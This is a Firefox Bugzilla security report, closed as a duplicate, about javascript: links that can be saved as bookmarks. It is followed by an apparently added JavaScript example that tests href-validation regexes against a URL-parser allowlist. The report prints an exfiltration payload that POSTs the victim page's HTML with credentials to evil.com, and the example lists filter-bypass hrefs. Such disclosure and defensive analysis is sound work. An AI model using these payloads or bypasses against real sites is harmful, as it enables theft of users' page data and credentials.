Closed Bug 1721092 Opened 3 years ago Closed 3 years ago

Potential universal XSS in Firefox through a bookmarked link

Categories

(Firefox :: Security, task)

RESOLVED DUPLICATE of bug 371923

People

(Reporter: hj923, Unassigned)

References

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

Attached file bookmark.html

Hi,

My name is Joel, and I am still not sure whether this is a vulnerability. But if it really is, it should be fixed - otherwise that's also fine, because I'm in a learning process - so let me begin. It's actually very simple.

Environment

This vulnerability could be reproduced with this setup:

  • Firefox version: 90.0 (64-bit macOS, Intel CPU)
  • macOS version: 10.15.7

Steps to reproduce

Mozilla Firefox supports:

  1. Right-clicking on any link (for example, an <a> tag)
  2. And then bookmarking that link.

Now, you might already see where this is heading. Here are the steps to reproduce this XSS.

  1. A malicious website presents the user with the following HTML (the inner quotes must be single quotes, otherwise the attribute is terminated early and the payload never runs; `document.documentElement.innerHTML` is the serialized page, `document.innerHTML` is undefined):
<a href="javascript:fetch('https://evil.com', { credentials: 'include', method: 'POST', mode: 'no-cors', body: JSON.stringify(encodeURIComponent(document.documentElement.innerHTML)) })">
Bookmark me for later
</a>
  2. The user does not immediately click on the link to open whatever is inside href, but saves it for later by right-clicking on the link to show the native context menu and clicking 'Bookmark Link'.
  3. The user is prompted to review the 'Name', 'Location' (folder), and 'Tags' of the bookmark he/she is going to save, but interestingly enough, there is no actual link (that is, the href attribute) to be confirmed.
  4. The user clicks 'Save'.
  5. The user navigates to any other website to browse.
  6. The user wants to see the bookmark he/she saved for later and clicks on the bookmark.
  7. The fetch request fires as expected. The code above is the combination I found to extract as much information as possible from a victim, but it could be any valid JavaScript code to exploit the victim, really (for example, to exploit existing CSRF vulnerabilities on the webpage the user is currently on).

Cause

  • Firefox is not preventing any href attribute containing JavaScript code from being added as a bookmark. The entire cost of examining the validity and safety of the href attribute is entrusted to the user. This behavior is unlike Chrome, Edge, Opera, or Safari, where JavaScript code in href can't be directly bookmarked, which strongly suggests that this is a potential security problem.

Impact/Scenarios

  • 'Bookmark Link' is a quite accessible feature, because it can be reached with a single right click, meaning there may be a higher chance that a user will be tricked into it.
  • Although an attacker cannot control when the user will click on the bookmark, there is still a very high chance that an attacker will be able to retrieve a large amount of data if the user is indeed on a poorly configured website from a security point of view - for example, a website where the cookie is not specified as httpOnly, or sameSite is none (where CSP and CORS are just loose enough).
  • The most basic thing an attacker is able to achieve when CSP and CORS rules are loose enough is to view whatever text is on the victim's webpage: be it password, username, link to a profile picture, list of my friends, contacts, email addresses ... and so on.
  • An attacker may also attempt to deliver a mixture of this vulnerability and others. For example, using this vulnerability to exploit existing CSRF vulnerabilities on a popular website.

Mitigation

  1. Firefox can disable the 'Bookmark Link' function when the href is not a valid link, via a regex.
  2. To further prevent the user from adding malicious JavaScript code to his/her bookmarks, Firefox may also allow the user to review the href attribute in the prompt shown before it is saved. Currently, there is no way to know what the actual link (href attribute) was until the very moment the user clicks on the bookmark to supposedly navigate to that link.

Attached is a single HTML file containing these lines of code. Please try it.
<html>
  <body>
    <a href="javascript:alert(1)">Add this to bookmark</a>  
  </body>
</html>
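The report's first mitigation is a regex check on the href before offering 'Bookmark Link'. The following is an added example (not Firefox code, not the reporter's code) that puts the reporter's `^javascript:` regex idea beside a check based on the WHATWG URL parser, which is what a browser actually resolves the href with. The page URL, the allowlist of bookmarkable schemes and the sample hrefs are constructed for the example. The point it shows is that the URL parser strips leading/trailing spaces and removes embedded tabs and newlines before reading the scheme, so a regex over the raw attribute text lets through hrefs that still resolve to `javascript:`.

```javascript
// Added example: is a link's href safe to offer for "Bookmark Link"?
// Compares a raw-text regex with a parser-based scheme allowlist.

// Assumption for this example: only web links are bookmarkable. A real
// browser allows more schemes; the allowlist is what matters, not its size.
const BOOKMARKABLE_SCHEMES = new Set(["http:", "https:"]);

// Constructed page URL that the link's href is resolved against.
const PAGE_URL = "https://example.test/article";

// Naive check in the spirit of the reporter's mitigation (1):
// reject hrefs whose raw text starts with "javascript:".
function naiveRegexAllows(href) {
  return !/^javascript:/i.test(href);
}

// Resolve the href the way the browser does, then allowlist the scheme.
// Returns null for hrefs that do not parse at all.
function resolvedScheme(href, pageUrl = PAGE_URL) {
  try {
    return new URL(href, pageUrl).protocol;
  } catch {
    return null;
  }
}

function parserAllows(href, pageUrl = PAGE_URL) {
  const scheme = resolvedScheme(href, pageUrl);
  return scheme !== null && BOOKMARKABLE_SCHEMES.has(scheme);
}

// Constructed href attribute values, as an attacker might write them.
const SAMPLE_HREFS = [
  "https://example.test/next",                  // ordinary absolute link
  "/relative/path",                             // relative link, resolves to https:
  "javascript:alert(1)",                        // the report's PoC
  "JavaScript:alert(1)",                        // case variation
  "  javascript:alert(1)",                      // leading spaces, stripped by the URL parser
  "java\tscript:alert(1)",                      // embedded tab, removed by the URL parser
  "java\nscript:alert(1)",                      // embedded newline, likewise removed
  "data:text/html,<script>alert(1)</script>",   // not javascript:, still not a web link
];

// One row per sample: what each check decides and what the href resolves to.
function evaluateSamples(hrefs = SAMPLE_HREFS) {
  return hrefs.map((href) => ({
    href,
    regexAllows: naiveRegexAllows(href),
    parserAllows: parserAllows(href),
    scheme: resolvedScheme(href),
  }));
}

// Samples the regex would let through even though they resolve to javascript:.
function regexBypasses(hrefs = SAMPLE_HREFS) {
  return evaluateSamples(hrefs)
    .filter((r) => r.regexAllows && r.scheme === "javascript:")
    .map((r) => r.href);
}

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.table(evaluateSamples());
  console.log("regex bypasses:", regexBypasses());
}
```

The parser-based check also covers the report's second point indirectly: the string worth showing in the bookmark dialog is the resolved URL (`new URL(href, pageUrl).href`), not the raw attribute text, since that is what will be navigated to when the bookmark is clicked.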
Flags: sec-bounty?
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
See Also: → 1725487